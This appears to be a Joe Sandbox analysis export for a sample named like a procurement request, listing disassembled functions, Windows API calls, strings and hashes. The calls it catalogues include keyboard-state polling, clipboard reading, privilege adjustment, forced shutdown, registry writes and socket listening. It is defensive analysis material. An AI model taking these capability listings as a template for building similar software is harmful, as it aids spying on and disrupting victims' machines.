                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: %d/%02d/%02d$@U=u
                                              • API String ID: 3850602802-2764005415
                                              • Opcode ID: c150a35aa0aea26c336250a7fd2fbbf1b3fd8950a95109cb9264f91c14d693cf
                                              • Instruction ID: 8fdcee2e4321e2c43e02aa58819409227a79e2349e875d98e0a7482cb4423dc9
                                              • Opcode Fuzzy Hash: c150a35aa0aea26c336250a7fd2fbbf1b3fd8950a95109cb9264f91c14d693cf
                                              • Instruction Fuzzy Hash: BE12C471501244AFEB259F28DC49FAE7BB8EF49710F21422DF516EA2E1DFB08991CB50
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove$_memset
                                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                              • API String ID: 1357608183-1798697756
                                              • Opcode ID: 1c645521647b3ca19851c3a09396bff064d18e53c314f6e5eae7a802cb2f391d
                                              • Instruction ID: 77c00d6c36b5d934b4ac2897b2c0eeac14a2c3380a7e41ca4ab7e35990a19ddf
                                              • Opcode Fuzzy Hash: 1c645521647b3ca19851c3a09396bff064d18e53c314f6e5eae7a802cb2f391d
                                              • Instruction Fuzzy Hash: 72939071A04219DFDB24DF98C881BBDB7B1FF48710F25816AE959EB280E7709E81DB44
                                              APIs
                                              • GetForegroundWindow.USER32(00000000,?), ref: 000E4A3D
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0011DA8E
                                              • IsIconic.USER32(?), ref: 0011DA97
                                              • ShowWindow.USER32(?,00000009), ref: 0011DAA4
                                              • SetForegroundWindow.USER32(?), ref: 0011DAAE
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0011DAC4
                                              • GetCurrentThreadId.KERNEL32 ref: 0011DACB
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0011DAD7
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0011DAE8
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0011DAF0
                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 0011DAF8
                                              • SetForegroundWindow.USER32(?), ref: 0011DAFB
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011DB10
                                              • keybd_event.USER32(00000012,00000000), ref: 0011DB1B
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011DB25
                                              • keybd_event.USER32(00000012,00000000), ref: 0011DB2A
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011DB33
                                              • keybd_event.USER32(00000012,00000000), ref: 0011DB38
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011DB42
                                              • keybd_event.USER32(00000012,00000000), ref: 0011DB47
                                              • SetForegroundWindow.USER32(?), ref: 0011DB4A
                                              • AttachThreadInput.USER32(?,?,00000000), ref: 0011DB71
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 4125248594-2988720461
                                              • Opcode ID: a1c8da74b20993ca7a7d0d066f728caa8b249cae9b7f6880d2bbd6d7f7ff1ae7
                                              • Instruction ID: a3a1f5705d5818fd6a6997dcd13a256702710f516dd4cd963ae8c3579da67237
                                              • Opcode Fuzzy Hash: a1c8da74b20993ca7a7d0d066f728caa8b249cae9b7f6880d2bbd6d7f7ff1ae7
                                              • Instruction Fuzzy Hash: 73318571A44318BFEB246F61AC4AFBF3E6CEB44B50F114039FA05E71D0C6B05D81AAA5
                                              APIs
                                                • Part of subcall function 00138CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00138D0D
                                                • Part of subcall function 00138CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00138D3A
                                                • Part of subcall function 00138CC3: GetLastError.KERNEL32 ref: 00138D47
                                              • _memset.LIBCMT ref: 0013889B
                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001388ED
                                              • CloseHandle.KERNEL32(?), ref: 001388FE
                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00138915
                                              • GetProcessWindowStation.USER32 ref: 0013892E
                                              • SetProcessWindowStation.USER32(00000000), ref: 00138938
                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00138952
                                                • Part of subcall function 00138713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00138851), ref: 00138728
                                                • Part of subcall function 00138713: CloseHandle.KERNEL32(?,?,00138851), ref: 0013873A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
• Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                              • String ID: $default$winsta0
                                              • API String ID: 2063423040-1027155976
                                              APIs
                                              • OpenClipboard.USER32(0016F910), ref: 00154284
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00154292
                                              • GetClipboardData.USER32(0000000D), ref: 0015429A
                                              • CloseClipboard.USER32 ref: 001542A6
                                              • GlobalLock.KERNEL32(00000000), ref: 001542C2
                                              • CloseClipboard.USER32 ref: 001542CC
                                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 001542E1
                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 001542EE
                                              • GetClipboardData.USER32(00000001), ref: 001542F6
                                              • GlobalLock.KERNEL32(00000000), ref: 00154303
                                              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00154337
                                              • CloseClipboard.USER32 ref: 00154447
                                              Similarity
                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                              • String ID:
                                              • API String ID: 3222323430-0
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0014C9F8
                                              • FindClose.KERNEL32(00000000), ref: 0014CA4C
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0014CA71
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0014CA88
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0014CAAF
                                              • __swprintf.LIBCMT ref: 0014CAFB
                                              • __swprintf.LIBCMT ref: 0014CB3E
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                              • __swprintf.LIBCMT ref: 0014CB92
                                                • Part of subcall function 001038D8: __woutput_l.LIBCMT ref: 00103931
                                              • __swprintf.LIBCMT ref: 0014CBE0
                                                • Part of subcall function 001038D8: __flsbuf.LIBCMT ref: 00103953
                                                • Part of subcall function 001038D8: __flsbuf.LIBCMT ref: 0010396B
                                              • __swprintf.LIBCMT ref: 0014CC2F
                                              • __swprintf.LIBCMT ref: 0014CC7E
                                              • __swprintf.LIBCMT ref: 0014CCCD
                                              Similarity
                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                              • API String ID: 3953360268-2428617273
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 0014F221
                                              • _wcscmp.LIBCMT ref: 0014F236
                                              • _wcscmp.LIBCMT ref: 0014F24D
                                              • GetFileAttributesW.KERNEL32(?), ref: 0014F25F
                                              • SetFileAttributesW.KERNEL32(?,?), ref: 0014F279
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0014F291
                                              • FindClose.KERNEL32(00000000), ref: 0014F29C
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0014F2B8
                                              • _wcscmp.LIBCMT ref: 0014F2DF
                                              • _wcscmp.LIBCMT ref: 0014F2F6
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0014F308
                                              • SetCurrentDirectoryW.KERNEL32(0019A5A0), ref: 0014F326
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0014F330
                                              • FindClose.KERNEL32(00000000), ref: 0014F33D
                                              • FindClose.KERNEL32(00000000), ref: 0014F34F
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1803514871-438819550
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00160BDE
                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0016F910,00000000,?,00000000,?,?), ref: 00160C4C
                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00160C94
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00160D1D
                                              • RegCloseKey.ADVAPI32(?), ref: 0016103D
                                              • RegCloseKey.ADVAPI32(00000000), ref: 0016104A
                                              Similarity
                                              • API ID: Close$ConnectCreateRegistryValue
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 536824911-966354055
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 0014F37E
                                              • _wcscmp.LIBCMT ref: 0014F393
                                              • _wcscmp.LIBCMT ref: 0014F3AA
                                                • Part of subcall function 001445C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001445DC
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0014F3D9
                                              • FindClose.KERNEL32(00000000), ref: 0014F3E4
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0014F400
                                              • _wcscmp.LIBCMT ref: 0014F427
                                              • _wcscmp.LIBCMT ref: 0014F43E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0014F450
                                              • SetCurrentDirectoryW.KERNEL32(0019A5A0), ref: 0014F46E
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0014F478
                                              • FindClose.KERNEL32(00000000), ref: 0014F485
                                              • FindClose.KERNEL32(00000000), ref: 0014F497
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 1824444939-438819550
                                              APIs
                                                • Part of subcall function 0013874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00138766
                                                • Part of subcall function 0013874A: GetLastError.KERNEL32(?,0013822A,?,?,?), ref: 00138770
                                                • Part of subcall function 0013874A: GetProcessHeap.KERNEL32(00000008,?,?,0013822A,?,?,?), ref: 0013877F
                                                • Part of subcall function 0013874A: HeapAlloc.KERNEL32(00000000,?,0013822A,?,?,?), ref: 00138786
                                                • Part of subcall function 0013874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0013879D
                                                • Part of subcall function 001387E7: GetProcessHeap.KERNEL32(00000008,00138240,00000000,00000000,?,00138240,?), ref: 001387F3
                                                • Part of subcall function 001387E7: HeapAlloc.KERNEL32(00000000,?,00138240,?), ref: 001387FA
                                                • Part of subcall function 001387E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00138240,?), ref: 0013880B
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0013825B
                                              • _memset.LIBCMT ref: 00138270
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0013828F
                                              • GetLengthSid.ADVAPI32(?), ref: 001382A0
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 001382DD
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001382F9
                                              • GetLengthSid.ADVAPI32(?), ref: 00138316
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00138325
                                              • HeapAlloc.KERNEL32(00000000), ref: 0013832C
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0013834D
                                              • CopySid.ADVAPI32(00000000), ref: 00138354
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00138385
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001383AB
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001383BF
                                              Similarity
                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 3996160137-0
                                              Similarity
                                              • API ID:
                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                              • API String ID: 0-4052911093
                                              APIs
                                                • Part of subcall function 001610A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00160038,?,?), ref: 001610BC
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00160737
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001607D6
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0016086E
                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00160AAD
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00160ABA
                                              Similarity
                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                              • String ID:
                                              • API String ID: 1240663315-0
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00140241
                                              • GetAsyncKeyState.USER32(000000A0), ref: 001402C2
                                              • GetKeyState.USER32(000000A0), ref: 001402DD
                                              • GetAsyncKeyState.USER32(000000A1), ref: 001402F7
                                              • GetKeyState.USER32(000000A1), ref: 0014030C
                                              • GetAsyncKeyState.USER32(00000011), ref: 00140324
                                              • GetKeyState.USER32(00000011), ref: 00140336
                                              • GetAsyncKeyState.USER32(00000012), ref: 0014034E
                                              • GetKeyState.USER32(00000012), ref: 00140360
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00140378
                                              • GetKeyState.USER32(0000005B), ref: 0014038A
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              APIs
                                              Similarity
                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                              • String ID:
                                              • API String ID: 1737998785-0
                                              • Opcode ID: c7b4de284d04e2ab1c868e1141d6545562d25e058fba0911821b32f19d6e373e
                                              • Instruction ID: 80e31109dfcc82c4f9b676cf90e8f32b72ff405a8405e34cb725806e6d72c18e
                                              • Opcode Fuzzy Hash: c7b4de284d04e2ab1c868e1141d6545562d25e058fba0911821b32f19d6e373e
                                              • Instruction Fuzzy Hash: 5421A135200210EFDB10AF24EC09B6D77A8EF54715F14802AF946DB2B2DBB0AC81CB95
                                              APIs
                                                • Part of subcall function 000E48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000E48A1,?,?,000E37C0,?), ref: 000E48CE
                                                • Part of subcall function 00144CD3: GetFileAttributesW.KERNEL32(?,00143947), ref: 00144CD4
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00143ADF
                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00143B87
                                              • MoveFileW.KERNEL32(?,?), ref: 00143B9A
                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00143BB7
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00143BD9
                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00143BF5
                                              Strings
                                              Similarity
                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 4002782344-1173974218
                                              • Opcode ID: 51ca5cfaa488aa225e3c1bde26a15cdf28347f3b7e4f71dfe4e077cdb8055d70
                                              • Instruction ID: 348a250f27943c0fdb46e06e61cf48e5c740ba5e6c5dc9546c1ef77314e62477
                                              • Opcode Fuzzy Hash: 51ca5cfaa488aa225e3c1bde26a15cdf28347f3b7e4f71dfe4e077cdb8055d70
                                              • Instruction Fuzzy Hash: E151B33180518C9ECF05EBA1DE929EDB778AF14300F6841A9E456771A2EF716F0DCBA1
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0014F6AB
                                              • Sleep.KERNEL32(0000000A), ref: 0014F6DB
                                              • _wcscmp.LIBCMT ref: 0014F6EF
                                              • _wcscmp.LIBCMT ref: 0014F70A
                                              • FindNextFileW.KERNEL32(?,?), ref: 0014F7A8
                                              • FindClose.KERNEL32(00000000), ref: 0014F7BE
                                              Strings
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                              • String ID: *.*
                                              • API String ID: 713712311-438819550
                                              • Opcode ID: 3c8aeaaba50c0628c3fcd023fcc01f30cebd53a4096d251bc8eb552d73f08a89
                                              • Instruction ID: 47a0cfb5f5b82f9aed0e55c6b7bac6c141d524cf9c2b26c9f8417d345d14cbe0
                                              • Opcode Fuzzy Hash: 3c8aeaaba50c0628c3fcd023fcc01f30cebd53a4096d251bc8eb552d73f08a89
                                              • Instruction Fuzzy Hash: 8741817190020A9FDF15DF64CC85EEEBBB4FF05311F14456AE819A32A1EB749E85CBA0
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                              • API String ID: 0-1546025612
                                              • Opcode ID: 6b6f6be8a8c59024b34da95f348d69f2a5205f236c8b9c137ed3c1edd7efeca0
                                              • Instruction ID: 5278fe78aeb232283c2e28d102e14b2daa0a15d9c9b073261006d813e54874de
                                              • Opcode Fuzzy Hash: 6b6f6be8a8c59024b34da95f348d69f2a5205f236c8b9c137ed3c1edd7efeca0
                                              • Instruction Fuzzy Hash: 81A28E70E0422E8BDF24CF58D9907BEB7B1FB54314F2481AADD15A7A80E7709E91EB50
                                              APIs
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: ed8c1b4777b6a4875c41f3853aca3d7eafa04a4fb62848365bb9748baeb7d5b5
                                              • Instruction ID: 8a574936b05d1d174b9ead3c5d0221f2f31c2bfb286595ed96665a3127855bad
                                              • Opcode Fuzzy Hash: ed8c1b4777b6a4875c41f3853aca3d7eafa04a4fb62848365bb9748baeb7d5b5
                                              • Instruction Fuzzy Hash: 5712A870A00609EFDF18CFA5D991AEEB3F5FF48300F108569E946A7691EB36AD11CB50
                                              APIs
                                                • Part of subcall function 00138CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00138D0D
                                                • Part of subcall function 00138CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00138D3A
                                                • Part of subcall function 00138CC3: GetLastError.KERNEL32 ref: 00138D47
                                              • ExitWindowsEx.USER32(?,00000000), ref: 0014549B
                                              Strings
                                              Similarity
                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                              • String ID: $@$SeShutdownPrivilege
                                              • API String ID: 2234035333-194228
                                              • Opcode ID: 9a49801c51ccdfe670f5dbf7e220e4ec7aad07fd0f6af47562787e6fc5764a16
                                              • Instruction ID: 70e797488384a5cf2d6f6f373ac1b32f231904f08cb976e29ca5dc3021c8f81b
                                              • Opcode Fuzzy Hash: 9a49801c51ccdfe670f5dbf7e220e4ec7aad07fd0f6af47562787e6fc5764a16
                                              • Instruction Fuzzy Hash: D301F231655B116BFB2C6778EC4ABBA729AEB05753F290125FC07DA0F3FB905C8581A0
                                              APIs
                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001565EF
                                              • WSAGetLastError.WSOCK32(00000000), ref: 001565FE
                                              • bind.WSOCK32(00000000,?,00000010), ref: 0015661A
                                              • listen.WSOCK32(00000000,00000005), ref: 00156629
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00156643
                                              • closesocket.WSOCK32(00000000,00000000), ref: 00156657
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                              • String ID:
                                              • API String ID: 1279440585-0
                                              • Opcode ID: 7335cf49e4c6db0b3e057145fad70e6cd80cb9ba17f315828fc0bb622a88039d
                                              • Instruction ID: 2f04c3a292c3c6981fadbd95f9270504f5c224eef8830bd7e6e313e69955a8f7
                                              • Opcode Fuzzy Hash: 7335cf49e4c6db0b3e057145fad70e6cd80cb9ba17f315828fc0bb622a88039d
                                              • Instruction Fuzzy Hash: 6D219E30600200EFCB10AF24DC85B6EB7A9EF44321F148169F966AB3E2CB70AD45CB91
                                              APIs
                                                • Part of subcall function 00100FF6: std::exception::exception.LIBCMT ref: 0010102C
                                                • Part of subcall function 00100FF6: __CxxThrowException@8.LIBCMT ref: 00101041
                                              • _memmove.LIBCMT ref: 0013062F
                                              • _memmove.LIBCMT ref: 00130744
                                              • _memmove.LIBCMT ref: 001307EB
                                              Similarity
                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                              • String ID:
                                              • API String ID: 1300846289-0
                                              • Opcode ID: 776835a7be0396b98a6d737cb7f4b270d30882d6ea6f8161387aa247dc983e94
                                              • Instruction ID: c5b0412ad3554c85c0c2251d6bfca8c7bc35922a0dbf7fb1b031b6ad09d66cca
                                              • Opcode Fuzzy Hash: 776835a7be0396b98a6d737cb7f4b270d30882d6ea6f8161387aa247dc983e94
                                              • Instruction Fuzzy Hash: AD0290B0E00209DFDF05DF64D991ABE7BF5EF48300F1480A9E94AEB295EB319951CB91
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 000E19FA
                                              • GetSysColor.USER32(0000000F), ref: 000E1A4E
                                              • SetBkColor.GDI32(?,00000000), ref: 000E1A61
                                                • Part of subcall function 000E1290: DefDlgProcW.USER32(?,00000020,?), ref: 000E12D8
                                              Similarity
                                              • API ID: ColorProc$LongWindow
                                              • String ID:
                                              • API String ID: 3744519093-0
                                              • Opcode ID: 824183786bbfac2bd388b330a2edea49cb0d9cf9809ba1863c7d7f7daa4b1d86
                                              • Instruction ID: 426d6daacd767dcbbb32b0f1fec41f49aa3d4db4651cbcae83c9a9ce1ca0efd9
                                              • Opcode Fuzzy Hash: 824183786bbfac2bd388b330a2edea49cb0d9cf9809ba1863c7d7f7daa4b1d86
                                              • Instruction Fuzzy Hash: 66A1197120A5C4BED638AB2B9C94EFF359DDB4A381B180139F402F6592CB349D9192B7
                                              APIs
                                                • Part of subcall function 001580A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001580CB
                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00156AB1
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00156ADA
                                              • bind.WSOCK32(00000000,?,00000010), ref: 00156B13
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00156B20
                                              • closesocket.WSOCK32(00000000,00000000), ref: 00156B34
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 99427753-0
                                              • Opcode ID: f6d9ac66eae9c2a0a1fc50a6e1f7387c65b0d41a86d01f6cb04723719ec65166
                                              • Instruction ID: 36fcb5b6669f9c36393db1a8a0452cb62f451b6f46fe4b84d066d47183f51f94
                                              • Opcode Fuzzy Hash: f6d9ac66eae9c2a0a1fc50a6e1f7387c65b0d41a86d01f6cb04723719ec65166
                                              • Instruction Fuzzy Hash: 54417F75700210AFEB14AF65DC86FAE77A9AB44720F44805CFA5ABB3D3DB709D018791
                                              APIs
                                              Similarity
                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                              • String ID:
                                              • API String ID: 292994002-0
                                              • Opcode ID: 752e192906c81297cf985c93ec87c51091eddb54fe721159a2117c8a59ea6b03
                                              • Instruction ID: 8b581ced2afbec5c5b541f8f0424b6e9ce1af658bdd8ae7ab0963d27427bf638
                                              • Opcode Fuzzy Hash: 752e192906c81297cf985c93ec87c51091eddb54fe721159a2117c8a59ea6b03
                                              • Instruction Fuzzy Hash: 1311C172300A116FE7211F26EC44A6FBB9AFF54761F858039F806E7252CB709D52CAA5
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0014C69D
                                              • CoCreateInstance.OLE32(00172D6C,00000000,00000001,00172BDC,?), ref: 0014C6B5
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                              • CoUninitialize.OLE32 ref: 0014C922
                                              Strings
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                              • String ID: .lnk
                                              • API String ID: 2683427295-24824748
                                              • Opcode ID: 7db6d70707e71228f9a456352b9d79d4ca8c3d37323c33012be250da904e05a2
                                              • Instruction ID: 5ce99ab94486e53b0ea70071e0316e2043103b22faa0d37c12b7bc0f90b134fb
                                              • Opcode Fuzzy Hash: 7db6d70707e71228f9a456352b9d79d4ca8c3d37323c33012be250da904e05a2
                                              • Instruction Fuzzy Hash: E9A11CB1104245AFD700EF65CC91EABB7E8EF94704F04496CF156A71A2EB70EA49CB92
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00121D88,?), ref: 0015C312
                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0015C324
                                              Strings
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                              • API String ID: 2574300362-1816364905
                                              • Opcode ID: 64b5be0ea18a79b48ac62236a274303321eae3ae78f32ef94705efe2a04d4f36
                                              • Instruction ID: 0eb110bfdc6b25bdc30e3bfa939d43d09e6d6981a8117292fe39a0cba26c62c8
                                              • Instruction Fuzzy Hash: D6E01274600717CFDB605F25EC44A8676E4FF09756B80C43DECA5D6650E7B4D885CBA0
                                              Similarity
                                              • API ID: __itow__swprintf
                                              • String ID:
                                              • API String ID: 674341424-0
                                              • Opcode ID: 4c26f83ee74eae9d821aa8adeeb8a3a8a320eed448e4cf226d02377d106765bd
                                              • Instruction ID: 949efa827b1b8e2d755352edd023118a5b267b992b01ae0e9c09554ad57a6cca
                                              • Instruction Fuzzy Hash: A122BE715083559FC724DF24C881BAFB7E4BF84710F14492DFA9697292DB70EA04DB92
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0015F151
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0015F15F
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
